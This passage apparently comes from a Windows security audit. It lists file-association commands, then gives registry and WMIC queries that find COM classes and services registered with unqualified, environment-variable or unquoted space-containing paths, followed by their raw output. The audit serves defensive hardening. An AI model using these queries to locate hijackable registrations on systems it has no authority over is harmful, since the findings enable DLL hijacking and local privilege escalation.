inffile=%SystemRoot%\system32\NOTEPAD.EXE %1 inifile=%SystemRoot%\system32\NOTEPAD.EXE %1 LDAP="%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1" MacromediaFlashPaper.MacromediaFlashPaper="%ProgramFiles%\Internet Explorer\iexplore.exe" "%1" Microsoft.ProvTool.Provisioning.1="%SystemRoot%\System32\provtool.exe" "%1" /source ShellOpen Microsoft.System.Update.1="%systemroot%\system32\wusa.exe" "%1" %* ms-availablenetworks="%SystemRoot%\system32\LaunchWinApp.exe" "%1" ms-mmsys=%SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,Control_RunDLL %SystemRoot%\System32\mmsys.cpl %1 ms-msdt="%SystemRoot%\system32\msdt.exe" %1 ms-perception-simulation=%SystemRoot%\system32\PerceptionSimulation\PerceptionSimulationInput.exe %1 ms-quick-assist="%SystemRoot%\system32\quickassist.exe" %1 ms-rdx-document=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\RDXService,OpenRDXDocument %1 ms-settings-connectabledevices="%SystemRoot%\system32\LaunchWinApp.exe" "%1" ms-settings-displays-topology="%SystemRoot%\system32\LaunchWinApp.exe" "%1" ms-virtualtouchpad="%SystemRoot%\system32\LaunchWinApp.exe" "%1" mscfile=%SystemRoot%\system32\mmc.exe "%1" %* MSDASC=Rundll32.exe "%CommonProgramFiles%\System\OLE DB\oledb32.dll",OpenDSLFile %1 Msi.Package="%SystemRoot%\System32\msiexec.exe" /i "%1" %* Msi.Patch="%SystemRoot%\System32\msiexec.exe" /p "%1" %* MSInfoFile=%SystemRoot%\system32\msinfo32.exe "%1" msstylesfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,Control_RunDLL %SystemRoot%\system32\desk.cpl desk,@Appearance /Action:OpenMSTheme /file:"%1" odtfile="%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" opensearchdescription=%SystemRoot%\explorer.exe P7RFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenP7R %1 P7SFile=%SystemRoot%\system32\\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 pbkfile=%SystemRoot%\system32\rasphone.exe -f "%1" PerfFile=%SystemRoot%\system32\mmc.exe %systemroot%\system32\perfmon.msc /F "%1" PFXFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPFX %1 PhotoViewer.FileAssoc.Tiff=%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 prffile="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnPRF %1 ratfile="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\msrating.dll",ClickedOnRAT %1 RDP.File="%systemroot%\system32\mstsc.exe" "%1" RemoteAssistance.1="%systemRoot%\system32\msra.exe" -openfile "%1" rlefile="%systemroot%\system32\mspaint.exe" "%1" rtffile="%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" SavedDsQuery=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\dsquery.dll,OpenSavedDsQuery %1 search=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L search-ms=%SystemRoot%\Explorer.exe /separate,/idlist,%I,%L SHCmdFile=%SystemRoot%\explorer.exe SPCFile=%SystemRoot%\system32\rundll32.exe cryptext.dll,CryptExtOpenPKCS7 %1 textfile="%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" themefile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 themepackfile=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\themecpl.dll,OpenThemeAction %1 TIFImage.Document=%SystemRoot%\System32\rundll32.exe "%ProgramFiles%\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen %1 txtfile=%SystemRoot%\system32\NOTEPAD.EXE %1 Undecided=%SystemRoot%\system32\OpenWith.exe "%1" Unknown=%SystemRoot%\system32\OpenWith.exe "%1" VBEFile="%SystemRoot%\System32\WScript.exe" "%1" %* VBSFile="%SystemRoot%\System32\WScript.exe" "%1" %* vcard_wab_auto_file="%ProgramFiles%\Windows Mail\wab.exe" /vcard "%1" WAB.AssocProtocol.LDAP="%ProgramFiles%\Windows Mail\wab.exe" "/ldap:%1" wab_auto_file="%ProgramFiles%\Windows Mail\wab.exe" /Import "%1" wbcatfile=%SystemRoot%\system32\sdclt.exe /restorepage webpnpFile=%SystemRoot%\system32\wpnpinst.exe %1 Windows.CompositeFont="%SystemRoot%\System32\notepad.exe" "%1" WindowsStore.License=%SystemRoot%\System32\licensemanagershellext.exe "%1" wmffile="%systemroot%\system32\mspaint.exe" "%1" Wordpad.Document.1="%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" "%1" WPDContextMenu.Url="%SystemRoot%\System32\rundll32.exe" "%SystemRoot%\System32\ieframe.dll",OpenURL %l WSFFile="%SystemRoot%\System32\WScript.exe" "%1" %* WSHFile="%SystemRoot%\System32\WScript.exe" "%1" %* zapfile=%SystemRoot%\system32\NOTEPAD.EXE %1
All registered path names containing environment variables:
REG.EXE QUERY "HKEY_LOCAL_MACHINE" /D /F "%*^%\\" /S
COM classes registered with an unqualified filename or a pathname containing an environment variable:
( REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /E /F "InProcHandler" /K /S /VE REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /E /F "InProcHandler32" /K /S /VE REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /E /F "InProcServer" /K /S /VE REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /E /F "InProcServer32" /K /S /VE ) | FINDSTR.EXE /B /C:" (Default) REG_" 1>"%TMP%\Sloppy.tmp" FINDSTR.EXE /V "\\" "%TMP%\Sloppy.tmp" FINDSTR.EXE "%" "%TMP%\Sloppy.tmp"
COM servers
registered with an unquoted long
pathname containing a space:
( REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /E /F "LocalServer" /K /S /VE REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE" /E /F "LocalServer32" /K /S /VE ) | FINDSTR.EXE /B /C:" (Default) REG_" 1>"%TMP%\Sloppy.tmp" FINDSTR.EXE /I /C:"_SZ %CommonProgram" "%TMP%\Sloppy.tmp" FINDSTR.EXE /I /C:"_SZ %Program" "%TMP%\Sloppy.tmp" FINDSTR.EXE /I /C:"_SZ %ProgramFiles%" "%TMP%\Sloppy.tmp"
Command lines of services with unquoted long
pathnames
containing a space:
WMIC.EXE /APPEND:"%USERPROFILE%\Desktop\Sloppy.log" Service WHERE "NOT PathName LIKE '%.%' OR NOT PathName LIKE '%\\%' OR PathName LIKE '%SystemDrive%\\Program %' OR PathName LIKE '%\\Windows %'" GET Name, PathName, StartName
Name PathName StartName Sense "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe" LocalSystem WdNisSvc "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2004.6-0\NisSrv.exe" NT AUTHORITY\LocalService WinDefend "C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2004.6-0\MsMpEng.exe" LocalSystem WMPNetworkSvc "C:\Program Files\Windows Media Player\wmpnetwk.exe" NT AUTHORITY\NetworkService
COM classes registered with an unqualified filename or a pathname containing an environment variable:
FOR %? IN (InProcHandler InProcHandler32 InProcServer InProcServer32 LocalServer LocalServer32 DefaultIcon ToolBoxBitmap32) DO @WMIC.EXE /APPEND:"%USERPROFILE%\Desktop\Sloppy.log" PATH Win32_ClassicCOMClassSetting WHERE "NOT %? LIKE '%.%' OR NOT %? LIKE '%\\%' OR %? LIKE '%[%]APPDATA[%]%' OR %? LIKE '%[%]CommonProgramFiles[%]%' OR %? LIKE '%[%]CommonProgramFiles(x86)[%]%' OR %? LIKE '%[%]LOCALAPPDATA[%]%' OR %? LIKE '%[%]LOGONSERVER[%]%' OR %? LIKE '%[%]ProgramData[%]%' OR %? LIKE '%[%]ProgramFiles[%]%' OR %? LIKE '%[%]ProgramFiles(x86)[%]%' OR %? LIKE '%[%]PUBLIC[%]%' OR %? LIKE '%[%]SystemDrive[%]%' OR %? LIKE '%[%]SystemRoot[%]%' OR %? LIKE '%[%]TEMP[%]%' OR %? LIKE '%[%]TMP[%]%' OR %? LIKE '%[%]USERPROFILE[%]%' OR %? LIKE '%[%]WINDIR[%]%'" GET ComponentId, ProgId, %?
No Instance(s) Available. ComponentId InprocHandler32 ProgId {0e119e63-267a-4030-8c80-5b1972e0a456} %SystemRoot%\system32\shcore.dll {1535D95C-2365-447D-9800-B75501A19C0C} %SystemRoot%\system32\ShareHost.dll {195C8ACD-5F96-4C67-BBCF-B0CD7073500C} %SystemRoot%\system32\ShareHost.dll {1cc78354-9ded-4c1b-bd81-c67b0289a4e5} %SystemRoot%\system32\windows.storage.dll {214DFBF5-5983-4B54-996D-B7FC67E0A1FD} %SystemRoot%\system32\Windows.Storage.dll {251b1498-5cba-4bee-8242-2f57773151aa} %SystemRoot%\system32\Windows.Storage.dll {320690f4-8d7b-4f55-a98d-89ebb01fa776} %SystemRoot%\system32\Windows.Storage.dll {36BAA497-8C84-4700-96A1-88E1876EC5B9} %SystemRoot%\system32\ShareHost.dll {3c5edebe-16c6-4ee4-906b-436aa1f6ef9e} %SystemRoot%\system32\twinapi.appcore.dll {4333fd20-ca5f-4095-a535-edb00455ce66} %SystemRoot%\system32\shcore.dll {4347F4C2-6A7D-40DF-9A4F-C185317AF183} %SystemRoot%\system32\ShareHost.dll {594103b8-e428-4461-b8d7-dd0ae12d31d9} %SystemRoot%\system32\Windows.Storage.dll {70BF9CA8-182C-4BE8-8BE8-1A9217A5D1B5} %SystemRoot%\system32\Windows.Storage.dll {73FDDC80-AEA9-101A-98A7-00AA00374959} ole32.dll WordPad.Document.1 {7513af53-9c75-4ad4-b47e-8d855099e023} %SystemRoot%\system32\shcore.dll {788B686B-EA20-41CD-A018-1BFD506194B2} %SystemRoot%\system32\ShareHost.dll {7bce3cfb-954c-438f-974c-73a8e0593f1a} %SystemRoot%\system32\shcore.dll {7e57f418-1f71-4411-9e09-45884f4f4714} %SystemRoot%\system32\shcore.dll {8FF007D1-C3E3-44D5-86AF-2ECB5F663D7C} %SystemRoot%\system32\Windows.Storage.dll {a5183349-82de-4bfc-9c13-7d9dc578729c} %SystemRoot%\system32\Windows.Storage.dll {B243A9FD-C57A-4D3E-A7CF-21CAED64CB5A} %systemroot%\system32\CoreUIComponents.dll {be88f957-42cc-4da7-92cf-9bc35c5d5ee2} %SystemRoot%\system32\Windows.Storage.dll {ccc63ae1-56a5-4f9c-abe8-e55674f0c0a6} %SystemRoot%\system32\Windows.Storage.dll {CF0E916A-DA25-49CA-A264-1D41C009EED0} %SystemRoot%\system32\ShareHost.dll {D3E34B21-9D75-101A-8C3D-00AA001A1652} ole32.dll Paint.Picture {da158800-7434-4410-a0cd-e497c3b4a9da} %SystemRoot%\system32\Windows.Storage.dll {da620430-5f6c-447d-8091-c5757e275b37} %SystemRoot%\system32\shcore.dll {f1f72421-6433-4de9-982d-c8dc12cb569c} %SystemRoot%\system32\shcore.dll {fd8d7f86-2f0c-43bb-b225-97ac3c04567b} %SystemRoot%\system32\shcore.dll No Instance(s) Available. ERROR: Description = Exception occured. No Instance(s) Available. ComponentId LocalServer32 ProgId {0002DF01-0000-0000-C000-000000000046} "%ProgramFiles%\Internet Explorer\iexplore.exe" InternetExplorer.Application.1 {0002DF02-0000-0000-C000-000000000046} %SystemRoot%\system32\browser_broker.exe BrowserBroker.BrowserBroker.1 {00f2b433-44e4-4d88-b2b0-2698a0a91dba} "%SystemRoot%\System32\rundll32.exe" "%ProgramFiles%\Windows Photo Viewer\PhotoAcq.dll",AutoplayComServerW {00f2b433-44e4-4d88-b2b0-2698a0a91dba} Microsoft.PhotoAcqHWEventHandler.1 {0289a7c5-91bf-4547-81ae-fec91a89dec5} %systemroot%\system32\WinrsHost.exe {031EE060-67BC-460d-8847-E4A7C5E45A27} "%ProgramFiles%\Windows Media Player\wmprph.exe" {03837511-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.TraceDataProviderCollection.1 {03837513-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.TraceDataProvider.1 {0383751C-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.TraceSession.1 {03837521-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.DataCollectorSet.1 {03837525-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.DataCollectorSetCollection.1 {03837526-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.LegacyDataCollectorSet.1 {03837527-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.LegacyDataCollectorSetCollection.1 {03837528-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.LegacyTraceSession.1 {03837529-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.LegacyTraceSessionCollection.1 {03837530-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.TraceSessionCollection.1 {03837531-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.ServerDataCollectorSet.1 {03837532-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.ServerDataCollectorSetCollection.1 {03837538-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.BootTraceSession.1 {03837539-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.BootTraceSessionCollection.1 {03837546-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.SystemDataCollectorSet.1 {03837547-098B-11D8-9414-505054503030} %SystemRoot%\system32\plasrv.exe PLA.SystemDataCollectorSetCollection.1 {046AEAD9-5A27-4D3C-8A67-F82552E0A91B} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {046AEAD9-5A27-4D3C-8A67-F82552E0A91B} {047ea9a0-93bb-415f-a1c3-d7aeb3dd5087} %SystemRoot%\System32\fsquirt.exe {054AAE20-4BEA-4347-8A35-64A533254A9D} "%CommonProgramFiles%\microsoft shared\ink\TabTip.exe" {0823B6F8-F499-4d5e-B885-EA9CB4F43B24} %SystemRoot%\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.153_none_e74acfe72624a02b\TiWorker.exe {08FC06E4-C6B5-40BE-97B0-B80F943C615B} %SystemRoot%\System32\ProximityUxHost.exe {115e13cf-cfe8-4821-b0da-e06aa4d51426} %SystemRoot%\system32\RdpSaProxy.exe {1202DB60-1DAC-42C5-AED5-1ABDD432248E} %SystemRoot%\System32\mobsync.exe {152EA2A8-70DC-4C59-8B2A-32AA3CA0DCAC} "%SystemRoot%\System32\RmtTpmVscMgrSvr.exe" {16A18E86-7F6E-4C20-AD89-4FFC0DB7A96A} "%SystemRoot%\System32\TpmVscMgrSvr.exe" {19833350-BF9B-42A1-BDF0-BD1FCBE1FD31} "%SystemRoot%\System32\ImmersiveTpmVscMgrSvr.exe" {19C65143-6230-42FA-A58E-7D9FA9BE2EB5} %SystemRoot%\system32\wkspbroker.exe WorkspaceBroker.WorkspaceBroker.1 {1A1F4206-0688-4E7F-BE03-D82EC69DF9A5} %SystemRoot%\System32\mobsync.exe {1C749B87-568C-4865-8E73-6413F8372CE6} "%systemroot%\system32\lpksetup.exe" {1F87137D-0E7C-44d5-8C73-4EFFB68962F2} %systemroot%\system32\wbem\wmiprvse.exe -secured {24AC8F2B-4D4A-4C17-9607-6A4B14068F97} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {24AC8F2B-4D4A-4C17-9607-6A4B14068F97} {25B25D91-69A2-47fa-A375-FDC98189A06F} %systemroot%\system32\SyncHost.exe {266C72E7-62E8-11D1-AD89-00C04FD8FDFF} %SystemRoot%\system32\wbem\scrcons.exe {2744BC6A-4039-11E3-ABAD-8CFB6188709B} %SystemRoot%\system32\SettingSyncHost.exe {2B32ECC3-C3BB-4701-82BB-EB7FE370D999} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {2B32ECC3-C3BB-4701-82BB-EB7FE370D999} {2F93C02D-77F9-46B4-95FB-8CBB81EEB62C} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {2F93C02D-77F9-46B4-95FB-8CBB81EEB62C} {32BA16FD-77D9-4AFB-9C9F-703E92AD4BFF} %SystemRoot%\System32\cttunesvr.exe cttunesvr.CtTuner.1 {3C296D07-90AE-4FAC-86F9-65EAA8B82D22} %SystemRoot%\system32\SppExtComObj.exe {3eef301f-b596-4c0b-bd92-013beafce793} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} {4545dea0-2dfc-4906-a728-6d986ba399a9} %SystemRoot%\System32\ThumbnailExtractionHost.exe {45597c98-80f6-4549-84ff-752cf55e2d29} "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Enqueue {494C063B-1024-4DD1-89D3-713784E82044} %systemroot%\system32\spool\tools\PrintBrmEngine.exe {49B2791A-B1AE-4C90-9B8E-E860BA07F889} %SystemRoot%\system32\mmc.exe MMC20.Application.1 {49BD2028-1523-11D1-AD79-00C04FD8FDFF} %SystemRoot%\system32\wbem\unsecapp.exe {4AA0A5C4-1B9B-4F2E-99D7-99C6AEC83474} %SystemRoot%\system32\SettingSyncHost.exe {4F1DFCA6-3AAD-48E1-8406-4BC21A501D7C} %SystemRoot%\system32\wksprt.exe WorkspaceRuntime.Workspace.1 {515980c3-57fe-4c1e-a561-730dd256ab98} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {515980c3-57fe-4c1e-a561-730dd256ab98} {549e57e9-b362-49d1-b679-b64d510efe4b} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {549e57e9-b362-49d1-b679-b64d510efe4b} {5BD95610-9434-43C2-886C-57852CC8A120} %SystemRoot%\explorer.exe /factory,{5BD95610-9434-43C2-886C-57852CC8A120} {6295DF2D-35EE-11D1-8707-00C04FD93327} %SystemRoot%\System32\mobsync.exe {62AD5CB4-F168-4B95-8AAE-6F47A75D5D30} %SystemRoot%\system32\oobe\UserOOBEBroker.exe {682159d9-c321-47ca-b3f1-30e36b2ec8b9} %SystemRoot%\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} {69F9CB25-25E2-4BE1-AB8F-07AA7CB535E8} %SystemRoot%\System32\mobsync.exe {6d8ff8e8-730d-11d4-bf42-00b0d0118b56} %SystemRoot%\system32\upnpcont.exe {722b3793-5367-4446-b6bb-db89b05c1f24} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {722b3793-5367-4446-b6bb-db89b05c1f24} {73E709EA-5D93-4B2E-BBB0-99B7938DA9E4} %systemroot%\system32\wbem\wmiprvse.exe {73FDDC80-AEA9-101A-98A7-00AA00374959} "%ProgramFiles%\Windows NT\Accessories\WORDPAD.EXE" WordPad.Document.1 {75dff2b7-6936-4c06-a8bb-676a7b00b24b} %SystemRoot%\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} {8086ebd4-43e3-4b19-beb3-f0ea4ecf319c} %SystemRoot%\System32\sdiagnhost.exe {884e2049-217d-11da-b2a4-000e7bbb2b09} %systemroot%\system32\CertEnrollCtrl.exe X509Enrollment.CX509EnrollmentWebClassFactory.1 {884e2050-217d-11da-b2a4-000e7bbb2b09} %systemroot%\system32\CertEnrollCtrl.exe X509Enrollment.CX509EnrollmentHelper.1 {8b455e45-7cc8-4253-af5b-b2cd3313e9cc} %SystemRoot%\system32\SettingSyncHost.exe {8D8B8E30-C451-421B-8553-D2976AFA648C} %SystemRoot%\System32\mobsync.exe {94E03510-31B9-47a0-A44E-E932AC86BB17} "%ProgramFiles%\Windows Media Player\wmlaunch.exe" WMP.Device.1 {9678f47f-2435-475c-b24a-4606f8161c16} %systemroot%\system32\wsmprovhost.exe {98068995-54d2-4136-9bc9-6dbcb0a4683f} %systemroot%\system32\WinrsHost.exe {98BB952B-B23E-4737-8ABD-B553E7484B38} %SystemRoot%\system32\DeviceEnroller.exe {995C996E-D918-4a8c-A302-45719A6F4EA7} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} {9a97f12a-6b73-4dc4-b3c1-e9244c03adac} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {9a97f12a-6b73-4dc4-b3c1-e9244c03adac} {9aa46009-3ce0-458a-a354-715610a075e6} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} {9acf41ed-d457-4cc1-941b-ab02c26e4686} %systemroot%\system32\wsmprovhost.exe {9BA05972-F6A8-11CF-A442-00A0C90A8F39} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} {9C38ED61-D565-4728-AEEE-C80952F0ECDE} %SystemRoot%\System32\vdsldr.exe {9ecb380c-2333-4c68-9691-a569fe446820} %SystemRoot%\system32\fixmapi.exe {A19141CE-D197-4C8B-82C9-4995F5303497} %SystemRoot%\System32\DisplaySwitch.exe {A55803CC-4D53-404c-8557-FD63DBA95D24} %SystemRoot%\system32\WPDShextAutoplay.exe {a677570a-2ba2-4e9a-b2e2-8a02cd8b4fd3} %SystemRoot%\system32\PrintIsolationHost.exe PrintSys.CoPrintIsolationHost.1 {aac1009f-ab33-48f9-9a21-7f5b88426a2e} %SystemRoot%\system32\TSTheme.exe {AB93B6F1-BE76-4185-A488-A9001B105B94} %SystemRoot%\System32\BdeUISrv.exe BdeUISrv.BDEUILauncher.1 {B43A0C1E-B63F-4691-B68F-CD807A45DA01} %SystemRoot%\system32\TSWbPrxy.exe MSTSWebProxy.MSTSWebProxy.1 {B8558612-DF5E-4F95-BB81-8E910B327FB2} %SystemRoot%\System32\mobsync.exe {b8f87e75-d1d5-446b-931c-3f61b97bca7a} %systemroot%\system32\DXPServer.exe {B9B05098-3E30-483F-87F7-027CA78DA287} %SystemRoot%\system32\ApplicationFrameHost.exe {BA441419-0B3F-4FB6-A903-D16CC14CCA44} %SystemRoot%\system32\PickerHost.exe {BF8841C9-378A-4CAD-B4FC-5091366CBC0D} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {BF8841C9-378A-4CAD-B4FC-5091366CBC0D} {c08afd90-f2a1-11d1-8455-00a0c91f3880} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} {C6B167EA-DB3E-4659-BADC-D1CCC00EFE9C} %SystemRoot%\System32\FodHelper.exe FodHelper.FodHelperObj.1 {c82192ee-6cb5-4bc0-9ef0-fb818773790a} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} {C947D50F-378E-4FF6-8835-FCB50305244D} %SystemRoot%\system32\mobsync.exe {CC6D9715-F553-4299-B2CE-6C7851FAA03A} %SystemRoot%\system32\browser_broker.exe {cdc32574-7521-4124-90c3-8d5605a34933} "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /BurnCD {ceff45ee-c862-41de-aee2-a022c81eda92} %SystemRoot%\explorer.exe /factory,{ceff45ee-c862-41de-aee2-a022c81eda92} {D3E34B21-9D75-101A-8C3D-00AA001A1652} %systemroot%\system32\mspaint.exe Paint.Picture {d54378cd-91d8-4e10-a00b-819f9a9efcb1} %systemroot%\system32\printfilterpipelinesvc.exe PrintSys.CoFilterPipeline.1 {D5E8041D-920F-45e9-B8FB-B1DEB82C6E5E} "%ProgramFiles%\Internet Explorer\iexplore.exe" -startmediumtab {DC7A02CD-2E47-406C-BA5A-B08EC00C4238} %SystemRoot%\SysWOW64\fixmapi.exe {DF4FCC34-067A-4E0A-8352-4A1A5095346E} "%ProgramFiles%\Internet Explorer\iexplore.exe" -startmanager {e3a4e5ca-55b2-4a06-b1ab-8fbecc7bca4b} %SystemRoot%\system32\rundll32.exe /sta {fcc2867c-69ea-4d85-8058-7c214e611c97} {e44e9428-bdbc-4987-a099-40dc8fd255e7} %SystemRoot%\system32\OpenWith.exe {E7B3C0E0-FB47-49F6-A66B-8A7C2E4E7B9C} %SystemRoot%\splwow64.exe {ed1d0fdf-4414-470a-a56d-cfb68623fc58} "%ProgramFiles(x86)%\Windows Media Player\wmplayer.exe" /Play {F0A3A195-8D6A-4BC7-BD1F-3B2A2D5807CA} %SystemRoot%\system32\SettingSyncHost.exe {F1EFACAA-08A1-461B-9D28-7AA8947889A0} %systemroot%\system32\SyncHost.exe {F2506CD7-82C2-43D9-A1D3-F85F5EFE7D09} %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {F2506CD7-82C2-43D9-A1D3-F85F5EFE7D09} {F827EC16-664E-4B05-878C-02D242229094} %SystemRoot%\system32\CloudNotifications.exe {F87B28F1-DA9A-4F35-8EC0-800EFCF26B83} %SystemRoot%\System32\slui.exe SPPUI.SPPUIObjectInteractive.1 {fb479c02-9ec4-4fed-8599-debe037452cb} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {fb479c02-9ec4-4fed-8599-debe037452cb} {FDA74D11-C4A6-4577-9F73-D7CA8586E10C} %SystemRoot%\System32\ProximityUxHost.exe {FFB8655F-81B9-4fce-B89C-9A6BA76D13E7} %SystemRoot%\System32\rundll32.exe %SystemRoot%\System32\shell32.dll,SHCreateLocalServerRunDll {FFB8655F-81B9-4fce-B89C-9A6BA76D13E7} Shell.HWEventHandlerShellExecute.1 ComponentId DefaultIcon ProgId {025A5937-A6BE-4686-A844-36FE4BEC8B6D} %SystemRoot%\System32\powercpl.dll,-1 {031E4825-7B94-4dc3-B131-E946B44C8DD5} %SystemRoot%\system32\imageres.dll,-1023 {04731B67-D933-450a-90E6-4ACD2E9408FE} %SystemRoot%\system32\Windows.Storage.Search.dll,-323 {047ea9a0-93bb-415f-a1c3-d7aeb3dd5087} %SystemRoot%\System32\fsquirt.exe,-107 {05d7b0f4-2121-4eff-bf6b-ed3f69b894d9} %SystemRoot%\System32\taskbarcpl.dll,-1 {088e3905-0323-4b02-9826-5d99428e115f} %SystemRoot%\system32\imageres.dll,-184 {0c39a5cf-1a7a-40c8-ba74-8900e6df5fcd} %SystemRoot%\system32\imageres.dll,-117 {0DB7E03F-FC29-4DC6-9020-FF41B59E513A} %SystemRoot%\system32\imageres.dll,-198 {0DF44EAA-FF21-4412-828E-260A8728E7F1} %SystemRoot%\system32\imageres.dll,-80 {0F563B5F-8EE2-4516-BA0A-544DE058C75B} %SystemRoot%\System32\FileHistory.exe,-100 {1206F5F1-0569-412C-8FEC-3204630DFB70} %SystemRoot%\system32\Vault.dll,-1 {148BD520-A2AB-11CE-B11F-00AA00530503} %systemroot%\System32\mstask.dll,-101 {148BD52A-A2AB-11CE-B11F-00AA00530503} %systemroot%\System32\mstask.dll,0 {15eae92e-f17a-4431-9f28-805e482dafd4} %SystemRoot%\system32\imageres.dll,-87 {17cd9488-1228-4b2f-88ce-4298e93e0966} %SystemRoot%\System32\imageres.dll,-24 {1CF1260C-4DD0-4ebb-811F-33C572699FDE} %SystemRoot%\system32\imageres.dll,-108 {1FA9085F-25A2-489B-85D4-86326EEDCD87} %SystemRoot%\System32\wlanpref.dll {208D2C60-3AEA-1069-A2D7-08002B30309D} %SystemRoot%\system32\imageres.dll,-25 {20D04FE0-3AEA-1069-A2D8-08002B30309D} %SystemRoot%\System32\imageres.dll,-109 {21EC2020-3AEA-1069-A2DD-08002B30309D} %SystemRoot%\System32\imageres.dll,-27 {2227A280-3AEA-1069-A2DE-08002B30309D} %SystemRoot%\System32\imageres.dll,-26 {22877a6d-37a1-461a-91b0-dbda5aaebc99} %SystemRoot%\system32\imageres.dll,-117 {24ad3ad4-a569-4530-98e1-ab02f9417aa8} %SystemRoot%\system32\imageres.dll,-113 {2559a1f0-21d7-11d4-bdaf-00c04f60b9f0} %SystemRoot%\System32\imageres.dll,-177 {2559a1f2-21d7-11d4-bdaf-00c04f60b9f0} %SystemRoot%\System32\shell32.dll,-48 {2559a1f3-21d7-11d4-bdaf-00c04f60b9f0} %SystemRoot%\System32\imageres.dll,-100 {2559a1f5-21d7-11d4-bdaf-00c04f60b9f0} %SystemRoot%\explorer.exe,-254 {2559a1f7-21d7-11d4-bdaf-00c04f60b9f0} %SystemRoot%\System32\imageres.dll,-24 {26EE0668-A00A-44D7-9371-BEB064C98683} %SystemRoot%\System32\imageres.dll,-27 {28803F59-3A75-4058-995F-4EE5503B023C} %systemroot%\system32\DevicePairingFolder.dll,-200 {289AF617-1CC3-42A6-926C-E6A863F0E3BA} dlnashext.dll,-200 {2E17C0EF-2851-459b-A3C8-27A41D4BC9F7} %SystemRoot%\system32\themeui.dll,7 Theme.Manager.1 {2F6CE85C-F9EE-43CA-90C7-8A9BD53A2467} FileHistory.exe,0 {3080F90D-D7AD-11D9-BD98-0000947B0257} %SystemRoot%\explorer.exe,-103 